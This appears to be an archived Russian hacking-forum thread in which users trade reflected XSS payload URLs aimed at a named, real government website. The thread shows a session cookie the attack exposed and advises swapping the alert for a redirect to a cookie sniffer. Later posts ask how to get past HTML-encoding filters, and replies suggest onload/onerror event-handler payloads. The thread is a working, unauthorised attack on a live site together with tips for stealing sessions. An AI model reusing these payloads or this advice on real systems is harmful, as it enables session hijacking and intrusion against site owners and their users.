Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 
журналы новости статьи video форум подписка на «Хакер»

XSS

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Уязвимости] >> XSS
Имя
Сообщение << Старые топики   Новые топики >>
XSS - 2010-10-26 23:37:23.123333   
MrEpHap

Сообщений: 23
Оценки: 0
Присоединился: 2010-05-14 16:33:03.300000
 привет всем, я новичок, попробовал найти Xss проверьте пожалуйста это правильный xss ?

http://www.finpol.kz/kaz/search?q="><script>alert(document.cookie)</script>
Post #: 1
RE: XSS - 2010-10-27 00:04:12.190000   
Sрam

Сообщений: 2863
Оценки: 372
Присоединился: 2009-01-16 15:23:43.276666
quote:

ORIGINAL: MrEpHap

привет всем, я новичок, попробовал найти Xss проверьте пожалуйста это правильный xss ?

http://www.finpol.kz/kaz/search?q="&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;

Мы то попробуем, а вот у тебя что вышло?
Post #: 2
RE: XSS - 2010-10-27 00:13:20.113333   
MrEpHap

Сообщений: 23
Оценки: 0
Присоединился: 2010-05-14 16:33:03.300000
 http://www.finpol.kz/kaz/search?q=%22%3E+%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&sbmt=++OK++

окошка
PHPSESSID=g62advl5id9n0fdhlicq9ko3q1
Post #: 3
RE: XSS - 2010-10-27 00:17:11.990000   
MrEpHap

Сообщений: 23
Оценки: 0
Присоединился: 2010-05-14 16:33:03.300000
 http://www.finpol.kz/kaz/search?q="> <SCRIPT>alert("MrEpHap")</SCRIPT>
Post #: 4
RE: XSS - 2010-10-27 08:14:53.800000   
yMa.hacKer

Сообщений: -1779
Оценки: 10
Присоединился: 2010-01-10 14:25:47.293333
 да это xss
Post #: 5
RE: XSS - 2010-10-27 18:21:19.690000   
MrEpHap

Сообщений: 23
Оценки: 0
Присоединился: 2010-05-14 16:33:03.300000
 спс за ответ
Post #: 6
RE: XSS - 2010-10-30 07:56:18.146666   
SHiP WINTINY

Сообщений: 213
Оценки: 0
Присоединился: 2007-10-30 14:50:25.756666
 дальше вместо алерта пиши редирект на снифер..
Post #: 7
RE: XSS - 2010-10-30 19:21:03.820000   
MrEpHap

Сообщений: 23
Оценки: 0
Присоединился: 2010-05-14 16:33:03.300000
 ok
Post #: 8
RE: XSS - 2011-02-25 11:20:39.513333   
totosus

Сообщений: 26
Оценки: 0
Присоединился: 2010-05-28 14:17:53.206666
 При отправке коммента вида
&lt;script&gt;alert("xss!")&lt;script&gt; на некоторый сайт в коде страницы появляется следующее:
&amp;lt;script&amp;gt;alert("xss!")&amp;lt;/script&amp;gt;
Как зашифровать/спрятать скобки, чтобы обойти защиту?
Post #: 9
RE: XSS - 2011-02-26 08:27:54.003333   
antiporno

Сообщений: 79
Оценки: 0
Присоединился: 2010-12-24 14:22:00.863333
 http://tinyurl.ru/ один из простых способов.
Post #: 10
RE: XSS - 2011-02-26 11:01:46.266666   
Sрam

Сообщений: 2863
Оценки: 372
Присоединился: 2009-01-16 15:23:43.276666
quote:

ORIGINAL: antiporno

http://tinyurl.ru/ один из простых способов.

Что то непонятное ты посоветовал.8|
Post #: 11
RE: XSS - 2011-02-26 11:15:18.346666   
totosus

Сообщений: 26
Оценки: 0
Присоединился: 2010-05-28 14:17:53.206666
 а как tinyurl поможет мне при закидывании XSS'a в форму?
Post #: 12
RE: XSS - 2011-02-26 11:37:26.383333   
Sрam

Сообщений: 2863
Оценки: 372
Присоединился: 2009-01-16 15:23:43.276666
quote:

ORIGINAL: totosus

а как tinyurl поможет мне при закидывании XSS'a в форму?

Этот вопрос является ключевым во всей теме.
Post #: 13
RE: XSS - 2011-02-26 11:44:31.886666   
Sрam

Сообщений: 2863
Оценки: 372
Присоединился: 2009-01-16 15:23:43.276666
quote:

ORIGINAL: totosus

а как tinyurl поможет мне при закидывании XSS'a в форму?

Этот вопрос является ключевым во всей теме.
Post #: 14
RE: XSS - 2011-02-27 00:52:16.773333   
FriLL

Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
quote:

ORIGINAL: totosus

а как tinyurl поможет мне при закидывании XSS'a в форму?

никак
Post #: 15
RE: XSS - 2011-02-27 22:24:55.733333   
totosus

Сообщений: 26
Оценки: 0
Присоединился: 2010-05-28 14:17:53.206666
 то есть фильтр не обойти?
Post #: 16
RE: XSS - 2011-02-28 04:05:34.640000   
narviss

Сообщений: 5
Оценки: 0
Присоединился: 2010-12-06 07:39:00.496666
quote:

ORIGINAL: totosus

то есть фильтр не обойти?

Где заменяются <> , такой фильтр не обойти…<> заменяются везде, в майле , в гугле , на хакере…там ещё смотря как уязвимость, можно пробывать onload=alert(/xss/), onerror=alert(/xss/) и типо этого 8|
Post #: 17
RE: XSS - 2011-03-01 17:19:48.860000   
totosus

Сообщений: 26
Оценки: 0
Присоединился: 2010-05-28 14:17:53.206666
 спасибо
Post #: 18
RE: XSS - 2011-03-28 08:27:42.990000   
tkins

Сообщений: 82
Оценки: 0
Присоединился: 2011-02-17 15:46:32.423333
 Тоже раньше это делал
Post #: 19
RE: XSS - 2011-03-28 10:50:49.750000   
Sрam

Сообщений: 2863
Оценки: 372
Присоединился: 2009-01-16 15:23:43.276666
quote:

ORIGINAL: narviss

quote:

ORIGINAL: totosus

то есть фильтр не обойти?

Где заменяются &lt;&gt; , такой фильтр не обойти…&lt;&gt; заменяются везде, в майле , в гугле , на хакере…там ещё смотря как уязвимость, можно пробывать onload=alert(/xss/), onerror=alert(/xss/) и типо этого 8|


Обработка событий называется… Их полный список и применение к тому или иному тегу можно найти в гугле.
Post #: 20
Страниц:  [1]
Все форумы >> [Уязвимости] >> XSS







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.